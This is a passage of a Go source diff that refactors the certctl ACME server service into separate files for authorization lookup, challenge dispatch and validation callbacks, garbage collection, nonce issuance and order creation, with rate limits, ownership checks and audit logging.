if firstErr == nil {
|
|
||||||
firstErr = fmt.Errorf("acme gc: orders: %w", err)
|
|
||||||
}
|
|
||||||
} else if n > 0 {
|
|
||||||
atomicAddUint64(&s.metrics.GCOrdersInvalidatedTotal, uint64(n))
|
|
||||||
}
|
|
||||||
|
|
||||||
return firstErr
|
|
||||||
}
|
|
||||||
|
|
||||||
// atomicAddUint64 atomically adds delta to the counter c. The GC sweeps
// use it to add a rows-affected count in one step; per the original note,
// the metrics struct's own `bump` helper only covers the add-one case.
func atomicAddUint64(c *atomic.Uint64, delta uint64) {
	c.Add(delta)
}
|
|
||||||
|
|||||||
@@ -0,0 +1,45 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package service
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 9 (2026-05-14): extracted from
|
||||||
|
// internal/service/acme.go via the Option B sibling-file pattern.
|
||||||
|
// Package stays `service`; every external caller of
|
||||||
|
// `service.ACMEService.LookupAuthz(...)` / `ListAuthzsByOrder(...)`
|
||||||
|
// resolves the same way — pure mechanical relocation.
|
||||||
|
//
|
||||||
|
// This file holds the authz read-side concern. The authz write-side
|
||||||
|
// (status cascade after challenge validation) lives in
|
||||||
|
// acme_challenges.go alongside recordChallengeOutcome where it
|
||||||
|
// belongs operationally; the authz creation path stays inside
|
||||||
|
// CreateOrder in acme.go (orders own the per-order authz rows).
|
||||||
|
|
||||||
|
// LookupAuthz returns an authz by ID. Authz rows aren't account-scoped
|
||||||
|
// directly; the handler asserts via the parent order if needed.
|
||||||
|
func (s *ACMEService) LookupAuthz(ctx context.Context, authzID string) (*domain.ACMEAuthorization, error) {
|
||||||
|
authz, err := s.repo.GetAuthzByID(ctx, authzID)
|
||||||
|
if err != nil {
|
||||||
|
if errors.Is(err, repository.ErrNotFound) {
|
||||||
|
return nil, ErrACMEAuthzNotFound
|
||||||
|
}
|
||||||
|
return nil, fmt.Errorf("acme: lookup authz: %w", err)
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.AuthzReadTotal)
|
||||||
|
return authz, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// ListAuthzsByOrder returns the per-order authz rows. Used by
|
||||||
|
// MarshalOrder to compute the authorizations URL list.
|
||||||
|
func (s *ACMEService) ListAuthzsByOrder(ctx context.Context, orderID string) ([]*domain.ACMEAuthorization, error) {
|
||||||
|
return s.repo.ListAuthzsByOrder(ctx, orderID)
|
||||||
|
}
|
||||||
@@ -0,0 +1,267 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package service
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
jose "github.com/go-jose/go-jose/v4"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/api/acme"
|
||||||
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 9 (2026-05-14): extracted from
|
||||||
|
// internal/service/acme.go via the Option B sibling-file pattern.
|
||||||
|
// Package stays `service`; every external caller of
|
||||||
|
// `service.ACMEService.RespondToChallenge(...)` resolves the same
|
||||||
|
// way — pure mechanical relocation.
|
||||||
|
//
|
||||||
|
// This file holds the Phase 3 challenge dispatch + validator
|
||||||
|
// callback concern: the HTTP-facing RespondToChallenge entry point
|
||||||
|
// (which transitions the challenge to `processing` and submits it
|
||||||
|
// to the validator pool) plus the asynchronous recordChallengeOutcome
|
||||||
|
// callback (which persists the final challenge status and cascades
|
||||||
|
// the parent authz + order status). The authz read-side
|
||||||
|
// (LookupAuthz / ListAuthzsByOrder) lives in acme_authz.go.
|
||||||
|
|
||||||
|
// --- Phase 3 — challenge dispatch + validator callback -----------------
|
||||||
|
|
||||||
|
// ChallengeResponseShape is what RespondToChallenge returns to the
|
||||||
|
// handler: the post-dispatch challenge row (status=processing) so the
|
||||||
|
// handler can render it via acme.MarshalAuthorization-equivalent. The
|
||||||
|
// validator goroutine writes the final status (valid/invalid) as a
|
||||||
|
// callback after dispatch completes — clients fetching the challenge
|
||||||
|
// via authz GET get the eventual state.
//
// NOTE(review): the RespondToChallenge declared below returns
// *domain.ACMEChallenge directly rather than this wrapper — confirm
// whether any caller still uses ChallengeResponseShape.
|
||||||
|
type ChallengeResponseShape struct {
|
||||||
|
// Challenge is the challenge row handed back to the handler.
Challenge *domain.ACMEChallenge
|
||||||
|
}
|
||||||
|
|
||||||
|
// RespondToChallenge handles POST /acme/profile/<id>/challenge/<chall_id>
|
||||||
|
// per RFC 8555 §7.5.1.
|
||||||
|
//
|
||||||
|
// Behavior:
|
||||||
|
// - Look up the challenge + parent authz + parent order; assert the
|
||||||
|
// account owns the order.
|
||||||
|
// - If the challenge is already valid/invalid → idempotent return.
|
||||||
|
// - If pending: transition to processing (atomic via WithinTx + audit).
|
||||||
|
// - Submit to the validator pool with an onComplete callback that
|
||||||
|
// transitions the challenge to valid/invalid in another WithinTx
|
||||||
|
// (and cascades the parent authz status).
|
||||||
|
// - Return the challenge in its current (processing) state; the
|
||||||
|
// client polls authz/challenge for the eventual outcome.
|
||||||
|
func (s *ACMEService) RespondToChallenge(
|
||||||
|
ctx context.Context,
|
||||||
|
accountID, challengeID string,
|
||||||
|
accountJWK *jose.JSONWebKey,
|
||||||
|
) (*domain.ACMEChallenge, error) {
|
||||||
|
if s.tx == nil || s.auditService == nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, fmt.Errorf("acme: respond-to-challenge requires SetTransactor + SetAuditService")
|
||||||
|
}
|
||||||
|
if s.validatorPool == nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, ErrACMEChallengePoolUnconfigured
|
||||||
|
}
|
||||||
|
// Phase 5 — per-challenge respond rate limit. Defends against retry
|
||||||
|
// storms from a misbehaving client. Keyed by challengeID (not
|
||||||
|
// accountID) so a flood against one challenge doesn't drain the
|
||||||
|
// account's whole budget.
|
||||||
|
if s.rateLimiter != nil && s.cfg.RateLimitChallengeRespondsPerHour > 0 {
|
||||||
|
if !s.rateLimiter.Allow(acme.ActionChallengeRespond, challengeID, s.cfg.RateLimitChallengeRespondsPerHour) {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, ErrACMERateLimited
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
ch, err := s.repo.GetChallengeByID(ctx, challengeID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
if errors.Is(err, repository.ErrNotFound) {
|
||||||
|
return nil, ErrACMEChallengeNotFound
|
||||||
|
}
|
||||||
|
return nil, fmt.Errorf("acme: lookup challenge: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Idempotent re-POST: already valid/invalid → just return.
|
||||||
|
if ch.Status == domain.ACMEChallengeStatusValid || ch.Status == domain.ACMEChallengeStatusInvalid {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
||||||
|
return ch, nil
|
||||||
|
}
|
||||||
|
if ch.Status == domain.ACMEChallengeStatusProcessing {
|
||||||
|
// In-flight. Return the row as-is.
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
||||||
|
return ch, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Confirm the requesting account owns the parent authz/order.
|
||||||
|
authz, err := s.repo.GetAuthzByID(ctx, ch.AuthzID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, fmt.Errorf("acme: lookup parent authz: %w", err)
|
||||||
|
}
|
||||||
|
order, err := s.repo.GetOrderByID(ctx, authz.OrderID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, fmt.Errorf("acme: lookup parent order: %w", err)
|
||||||
|
}
|
||||||
|
if order.AccountID != accountID {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, ErrACMEOrderUnauthorized
|
||||||
|
}
|
||||||
|
|
||||||
|
// Compute the key authorization the validator needs.
|
||||||
|
expected, err := acme.KeyAuthorization(ch.Token, accountJWK)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, fmt.Errorf("acme: key authorization: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Transition challenge → processing (atomic with audit row).
|
||||||
|
ch.Status = domain.ACMEChallengeStatusProcessing
|
||||||
|
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
if err := s.repo.UpdateChallengeWithTx(ctx, q, ch); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
return s.auditService.RecordEventWithTx(ctx, q,
|
||||||
|
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
||||||
|
"acme_challenge_processing", "acme_challenge", ch.ChallengeID,
|
||||||
|
map[string]interface{}{
|
||||||
|
"authz_id": ch.AuthzID,
|
||||||
|
"type": string(ch.Type),
|
||||||
|
"identifier": authz.Identifier.Value,
|
||||||
|
})
|
||||||
|
}); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondFailTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
|
||||||
|
// Submit to the pool. The onComplete callback persists the final
|
||||||
|
// challenge status + cascades the parent authz status. We detach
|
||||||
|
// from the request context via context.WithoutCancel so the
|
||||||
|
// callback's WithinTx survives the HTTP handler returning, while
|
||||||
|
// preserving inherited values (logger, trace IDs, audit actor).
|
||||||
|
bgctx := context.WithoutCancel(ctx)
|
||||||
|
chSnapshot := *ch
|
||||||
|
authzSnapshot := *authz
|
||||||
|
identifier := authz.Identifier.Value
|
||||||
|
s.validatorPool.Submit(bgctx, string(ch.Type), identifier, ch.Token, expected, func(verr error) {
|
||||||
|
s.recordChallengeOutcome(bgctx, accountID, &chSnapshot, &authzSnapshot, verr)
|
||||||
|
})
|
||||||
|
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
||||||
|
return ch, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// recordChallengeOutcome is the validator-pool callback. Persists the
|
||||||
|
// challenge's final status + cascades the parent authz status.
|
||||||
|
//
|
||||||
|
// Authz cascade: if the challenge succeeded, the authz becomes valid
|
||||||
|
// (RFC 8555 §7.1.6: any one challenge passing makes the authz valid).
|
||||||
|
// If the challenge failed, the authz becomes invalid only if no other
|
||||||
|
// pending challenges remain (Phase 3 minimal-viable path: we mark the
|
||||||
|
// authz invalid on first failure since Phase 3 emits 1 challenge per
|
||||||
|
// authz; Phase 4+ extending to multi-challenge-per-authz revisits this).
|
||||||
|
func (s *ACMEService) recordChallengeOutcome(
|
||||||
|
ctx context.Context,
|
||||||
|
accountID string,
|
||||||
|
ch *domain.ACMEChallenge,
|
||||||
|
authz *domain.ACMEAuthorization,
|
||||||
|
verr error,
|
||||||
|
) {
|
||||||
|
now := time.Now().UTC()
|
||||||
|
var newAuthzStatus domain.ACMEAuthzStatus
|
||||||
|
if verr == nil {
|
||||||
|
ch.Status = domain.ACMEChallengeStatusValid
|
||||||
|
ch.ValidatedAt = &now
|
||||||
|
ch.Error = nil
|
||||||
|
newAuthzStatus = domain.ACMEAuthzStatusValid
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeValidateValid)
|
||||||
|
} else {
|
||||||
|
ch.Status = domain.ACMEChallengeStatusInvalid
|
||||||
|
if p := acme.ChallengeProblemFromError(string(ch.Type), verr); p != nil {
|
||||||
|
ch.Error = &domain.ACMEProblem{
|
||||||
|
Type: p.Type,
|
||||||
|
Detail: p.Detail,
|
||||||
|
Status: p.Status,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
newAuthzStatus = domain.ACMEAuthzStatusInvalid
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeValidateInvalid)
|
||||||
|
}
|
||||||
|
|
||||||
|
auditDetails := map[string]interface{}{
|
||||||
|
"authz_id": ch.AuthzID,
|
||||||
|
"type": string(ch.Type),
|
||||||
|
"identifier": authz.Identifier.Value,
|
||||||
|
"valid": verr == nil,
|
||||||
|
}
|
||||||
|
if verr != nil {
|
||||||
|
auditDetails["error"] = verr.Error()
|
||||||
|
}
|
||||||
|
|
||||||
|
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
if err := s.repo.UpdateChallengeWithTx(ctx, q, ch); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if err := s.repo.UpdateAuthzStatusWithTx(ctx, q, ch.AuthzID, newAuthzStatus); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
// Cascade: if the authz turned valid, see whether the order's
|
||||||
|
// authzs are now ALL valid; flip order to ready if so.
|
||||||
|
// Read-after-write to confirm.
|
||||||
|
authzs, err := s.repo.ListAuthzsByOrder(ctx, authz.OrderID)
|
||||||
|
if err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
allValid := len(authzs) > 0
|
||||||
|
anyInvalid := false
|
||||||
|
for _, a := range authzs {
|
||||||
|
if a.AuthzID == ch.AuthzID {
|
||||||
|
if newAuthzStatus != domain.ACMEAuthzStatusValid {
|
||||||
|
allValid = false
|
||||||
|
}
|
||||||
|
if newAuthzStatus == domain.ACMEAuthzStatusInvalid {
|
||||||
|
anyInvalid = true
|
||||||
|
}
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if a.Status != domain.ACMEAuthzStatusValid {
|
||||||
|
allValid = false
|
||||||
|
}
|
||||||
|
if a.Status == domain.ACMEAuthzStatusInvalid {
|
||||||
|
anyInvalid = true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
order, err := s.repo.GetOrderByID(ctx, authz.OrderID)
|
||||||
|
if err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
switch {
|
||||||
|
case allValid && order.Status == domain.ACMEOrderStatusPending:
|
||||||
|
order.Status = domain.ACMEOrderStatusReady
|
||||||
|
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
case anyInvalid && order.Status == domain.ACMEOrderStatusPending:
|
||||||
|
order.Status = domain.ACMEOrderStatusInvalid
|
||||||
|
order.Error = &domain.ACMEProblem{
|
||||||
|
Type: "urn:ietf:params:acme:error:incorrectResponse",
|
||||||
|
Detail: "one or more authorizations failed",
|
||||||
|
Status: 403,
|
||||||
|
}
|
||||||
|
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return s.auditService.RecordEventWithTx(ctx, q,
|
||||||
|
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
||||||
|
"acme_challenge_completed", "acme_challenge", ch.ChallengeID,
|
||||||
|
auditDetails)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,74 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package service
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
"sync/atomic"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 9 (2026-05-14): extracted from
|
||||||
|
// internal/service/acme.go via the Option B sibling-file pattern.
|
||||||
|
// Package stays `service`; every external caller of
|
||||||
|
// `service.ACMEService.GarbageCollect(...)` resolves the same way —
|
||||||
|
// pure mechanical relocation.
|
||||||
|
//
|
||||||
|
// This file holds the Phase 5 ACME GC sweep concern: the scheduler-
|
||||||
|
// invoked GarbageCollect entry point plus the atomicAddUint64
|
||||||
|
// counter helper (only consumed inside the sweep body for the
|
||||||
|
// rows-affected-N case the default `bump` doesn't cover).
|
||||||
|
|
||||||
|
// GarbageCollect runs a single ACME GC sweep. Phase 5 — the scheduler
|
||||||
|
// invokes this every cfg.GCInterval. Three independent sweeps:
|
||||||
|
//
|
||||||
|
// 1. Delete used / expired nonces.
|
||||||
|
// 2. Transition expired pending authzs to `expired`.
|
||||||
|
// 3. Transition expired pending/ready/processing orders to `invalid`.
|
||||||
|
//
|
||||||
|
// Each sweep is a single SQL statement (no per-row transactions) so a
|
||||||
|
// large reap is one atomic write per sweep. Per-sweep errors are
|
||||||
|
// logged-and-continued: a failing nonces sweep doesn't block the
|
||||||
|
// authzs sweep. Returns the first error encountered (for caller
|
||||||
|
// telemetry); per-sweep counts are recorded on metrics regardless.
|
||||||
|
//
|
||||||
|
// Idempotent — repeated runs are safe; the second run finds 0 rows.
|
||||||
|
func (s *ACMEService) GarbageCollect(ctx context.Context) error {
|
||||||
|
s.metrics.bump(&s.metrics.GCRunsTotal)
|
||||||
|
var firstErr error
|
||||||
|
|
||||||
|
if n, err := s.repo.GCExpiredNonces(ctx); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
||||||
|
if firstErr == nil {
|
||||||
|
firstErr = fmt.Errorf("acme gc: nonces: %w", err)
|
||||||
|
}
|
||||||
|
} else if n > 0 {
|
||||||
|
atomicAddUint64(&s.metrics.GCNoncesReapedTotal, uint64(n))
|
||||||
|
}
|
||||||
|
|
||||||
|
if n, err := s.repo.GCExpireAuthorizations(ctx); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
||||||
|
if firstErr == nil {
|
||||||
|
firstErr = fmt.Errorf("acme gc: authzs: %w", err)
|
||||||
|
}
|
||||||
|
} else if n > 0 {
|
||||||
|
atomicAddUint64(&s.metrics.GCAuthzsExpiredTotal, uint64(n))
|
||||||
|
}
|
||||||
|
|
||||||
|
if n, err := s.repo.GCInvalidateExpiredOrders(ctx); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
||||||
|
if firstErr == nil {
|
||||||
|
firstErr = fmt.Errorf("acme gc: orders: %w", err)
|
||||||
|
}
|
||||||
|
} else if n > 0 {
|
||||||
|
atomicAddUint64(&s.metrics.GCOrdersInvalidatedTotal, uint64(n))
|
||||||
|
}
|
||||||
|
|
||||||
|
return firstErr
|
||||||
|
}
|
||||||
|
|
||||||
|
// atomicAddUint64 adds delta to the counter. The metrics struct exposes
|
||||||
|
// only `bump` (add 1) by default; this helper covers the
|
||||||
|
// rows-affected-N case the GC needs.
|
||||||
|
func atomicAddUint64(c *atomic.Uint64, delta uint64) {
	// Single atomic read-modify-write; the new total is not needed.
	c.Add(delta)
}
|
||||||
@@ -0,0 +1,46 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package service
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/api/acme"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 9 (2026-05-14): extracted from
|
||||||
|
// internal/service/acme.go via the Option B sibling-file pattern
|
||||||
|
// (operator's choice post-Sprint-8). Package stays `service`; every
|
||||||
|
// external caller of `service.ACMEService.IssueNonce(...)` resolves
|
||||||
|
// the same way — pure mechanical relocation.
|
||||||
|
//
|
||||||
|
// This file holds the SERVER-issues-nonce concern: the IssueNonce
|
||||||
|
// method that generates + persists a fresh ACME nonce for the
|
||||||
|
// Replay-Nonce header per RFC 8555 §6.5. The nonceAdapter type
|
||||||
|
// (which wraps ACMERepo.ConsumeNonce for the JWS verifier) stays
|
||||||
|
// in acme.go alongside VerifyJWS — it's a verification-infrastructure
|
||||||
|
// helper, not a server-side nonce concern.
|
||||||
|
|
||||||
|
// IssueNonce generates a fresh ACME nonce, persists it with the
|
||||||
|
// configured TTL, and returns the encoded string for the
|
||||||
|
// Replay-Nonce header.
|
||||||
|
//
|
||||||
|
// RFC 8555 §6.5: every successful ACME response carries a
|
||||||
|
// Replay-Nonce. Phase 1a wires this via the directory + new-nonce
|
||||||
|
// handlers; Phase 1b extends with new-account + account/<id> POST
|
||||||
|
// responses (the JWS-authenticated paths).
|
||||||
|
func (s *ACMEService) IssueNonce(ctx context.Context) (string, error) {
|
||||||
|
nonce, err := acme.GenerateNonce()
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewNonceFailureTotal)
|
||||||
|
return "", fmt.Errorf("acme: generate nonce: %w", err)
|
||||||
|
}
|
||||||
|
if err := s.repo.IssueNonce(ctx, nonce, s.cfg.NonceTTL); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewNonceFailureTotal)
|
||||||
|
return "", fmt.Errorf("acme: persist nonce: %w", err)
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.NewNonceTotal)
|
||||||
|
return nonce, nil
|
||||||
|
}
|
||||||
@@ -0,0 +1,540 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package service
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
cryptorand "crypto/rand"
|
||||||
|
"crypto/x509"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/api/acme"
|
||||||
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 9b (2026-05-14): the deferred half of
|
||||||
|
// Sprint 9. Extracted from internal/service/acme.go via the Option B
|
||||||
|
// sibling-file pattern. Package stays `service`; every external caller
|
||||||
|
// of `service.ACMEService.{CreateOrder,LookupOrder,FinalizeOrder,
|
||||||
|
// LookupCertificate}` resolves the same way — pure mechanical
|
||||||
|
// relocation.
|
||||||
|
//
|
||||||
|
// What lives here
|
||||||
|
// ===============
|
||||||
|
// The Phase 2 orders concern in full: the order CRUD methods
|
||||||
|
// (CreateOrder + LookupOrder + FinalizeOrder + LookupCertificate),
|
||||||
|
// the FinalizeOrderResult shape, the order-scoped accountOwnsACMECert
|
||||||
|
// ownership check, and the three orders-internal ID helpers
|
||||||
|
// (randIDSuffix + base32encode for generating acme-ord-* / acme-authz-* /
|
||||||
|
// acme-chall-* / mc-acme-* prefixes per the project's TEXT-primary-keys
|
||||||
|
// architecture decision; identifierStrings for audit detail rendering).
|
||||||
|
//
|
||||||
|
// What stays in acme.go (cross-concern by helper-call analysis)
|
||||||
|
// =============================================================
|
||||||
|
// firstAvailableIssuer remains in acme.go. Three call sites consume
|
||||||
|
// it: FinalizeOrder (here in acme_orders.go) AND Phase 4 RevokeCert
|
||||||
|
// + RenewalInfo (both in acme.go). Moving it here would leave Phase 4
|
||||||
|
// reaching across a sibling-file boundary for a single helper; leaving
|
||||||
|
// it in acme.go keeps it adjacent to its other two callers while still
|
||||||
|
// staying reachable from this file via Go's same-package scope. The
|
||||||
|
// alternative (a third "shared helpers" sibling) costs an extra file
|
||||||
|
// for one helper — not worth the indirection.
|
||||||
|
//
|
||||||
|
// mapACMERevocationReason stays in acme.go too. It's used exclusively
|
||||||
|
// by Phase 4 RevokeCert. Despite sitting in the orders helper cluster
|
||||||
|
// in audit notes (because of its alphabetical-adjacency to the other
|
||||||
|
// helpers in the audit-time grep), the actual call graph puts it
|
||||||
|
// firmly on the Phase 4 side.
|
||||||
|
//
|
||||||
|
// Sprint 9 vs Sprint 9b
|
||||||
|
// =====================
|
||||||
|
// Sprint 9 (commit b503d27b) shipped nonces + authz + challenges + gc
|
||||||
|
// — four files, 432 LOC moved, all single-contiguous-region cuts.
|
||||||
|
// Sprint 9b crosses the harder boundary the original sprint deferred:
|
||||||
|
// a ~476-LOC two-block cut (orders block A + helpers block B with
|
||||||
|
// firstAvailableIssuer's 14 lines between them staying behind) plus
|
||||||
|
// the per-helper move-vs-stay decision documented above. Splitting
|
||||||
|
// 9 from 9b keeps the four contiguous cuts on one commit and the
|
||||||
|
// non-contiguous cut on its own, mirroring the Sprint 8 / Sprint 8b
|
||||||
|
// pattern (mechanical vs harder-shape, separate review windows).
|
||||||
|
|
||||||
|
// --- Phase 2 — orders + authz + finalize + cert download ---------------
|
||||||
|
|
||||||
|
// CreateOrder validates a new-order request against the bound profile
|
||||||
|
// and persists the order + per-identifier authz + per-authz challenge
|
||||||
|
// rows in one WithinTx. Returns the created order on success.
|
||||||
|
//
|
||||||
|
// Auth-mode dispatch:
|
||||||
|
// - trust_authenticated (default): order goes immediately to status=ready,
|
||||||
|
// each authz immediately to status=valid (no challenge validation
|
||||||
|
// required); a single placeholder http-01 challenge per authz is
|
||||||
|
// persisted with status=valid for RFC 8555 compliance (the spec
|
||||||
|
// requires challenges on every authz).
|
||||||
|
// - challenge: order stays at status=pending, authzs at status=pending,
|
||||||
|
// challenges at status=pending, until Phase 3's validators run.
|
||||||
|
func (s *ACMEService) CreateOrder(
|
||||||
|
ctx context.Context,
|
||||||
|
accountID, profileID string,
|
||||||
|
identifiers []domain.ACMEIdentifier,
|
||||||
|
notBefore, notAfter *time.Time,
|
||||||
|
) (*domain.ACMEOrder, error) {
|
||||||
|
if s.tx == nil || s.auditService == nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: new-order requires SetTransactor + SetAuditService")
|
||||||
|
}
|
||||||
|
// Phase 5 — per-account orders/hour cap. Hits return rateLimited
|
||||||
|
// (RFC 8555 §6.7) before any DB work. Counter is in-memory; restart
|
||||||
|
// wipes (eventual-consistency caps are acceptable).
|
||||||
|
if s.rateLimiter != nil && s.cfg.RateLimitOrdersPerHour > 0 {
|
||||||
|
if !s.rateLimiter.Allow(acme.ActionNewOrder, accountID, s.cfg.RateLimitOrdersPerHour) {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, ErrACMERateLimited
|
||||||
|
}
|
||||||
|
}
|
||||||
|
// Phase 5 — concurrent-orders cap. We count
|
||||||
|
// pending/ready/processing orders for this account; if at-or-over
|
||||||
|
// the cap, reject. This is a DB read (no FOR UPDATE), so two
|
||||||
|
// requests racing under the threshold can both succeed and push
|
||||||
|
// the account one over — accepted as eventual-consistency.
|
||||||
|
if s.cfg.RateLimitConcurrentOrders > 0 {
|
||||||
|
count, cerr := s.repo.CountActiveOrdersByAccount(ctx, accountID)
|
||||||
|
if cerr == nil && count >= s.cfg.RateLimitConcurrentOrders {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, ErrACMEConcurrentOrdersExceeded
|
||||||
|
}
|
||||||
|
}
|
||||||
|
resolvedProfileID, err := s.resolveProfile(ctx, profileID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
profile, err := s.profiles.Get(ctx, resolvedProfileID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: lookup profile: %w", err)
|
||||||
|
}
|
||||||
|
authMode := profile.ACMEAuthMode
|
||||||
|
if authMode == "" {
|
||||||
|
authMode = string(s.cfg.DefaultAuthMode)
|
||||||
|
}
|
||||||
|
if authMode == "" {
|
||||||
|
authMode = "trust_authenticated"
|
||||||
|
}
|
||||||
|
if authMode != "trust_authenticated" && authMode != "challenge" {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("%w: %q", ErrACMEUnsupportedAuthMode, authMode)
|
||||||
|
}
|
||||||
|
|
||||||
|
now := time.Now().UTC()
|
||||||
|
orderTTL := s.cfg.OrderTTL
|
||||||
|
if orderTTL <= 0 {
|
||||||
|
orderTTL = 24 * time.Hour
|
||||||
|
}
|
||||||
|
authzTTL := s.cfg.AuthzTTL
|
||||||
|
if authzTTL <= 0 {
|
||||||
|
authzTTL = 24 * time.Hour
|
||||||
|
}
|
||||||
|
|
||||||
|
// In trust_authenticated mode, the order goes straight to `ready`
|
||||||
|
// (RFC 8555 §7.1.6: ready means all authzs valid, awaiting CSR).
|
||||||
|
// In challenge mode, the order stays `pending` until challenges
|
||||||
|
// validate.
|
||||||
|
orderStatus := domain.ACMEOrderStatusPending
|
||||||
|
authzStatus := domain.ACMEAuthzStatusPending
|
||||||
|
challengeStatus := domain.ACMEChallengeStatusPending
|
||||||
|
if authMode == "trust_authenticated" {
|
||||||
|
orderStatus = domain.ACMEOrderStatusReady
|
||||||
|
authzStatus = domain.ACMEAuthzStatusValid
|
||||||
|
challengeStatus = domain.ACMEChallengeStatusValid
|
||||||
|
}
|
||||||
|
|
||||||
|
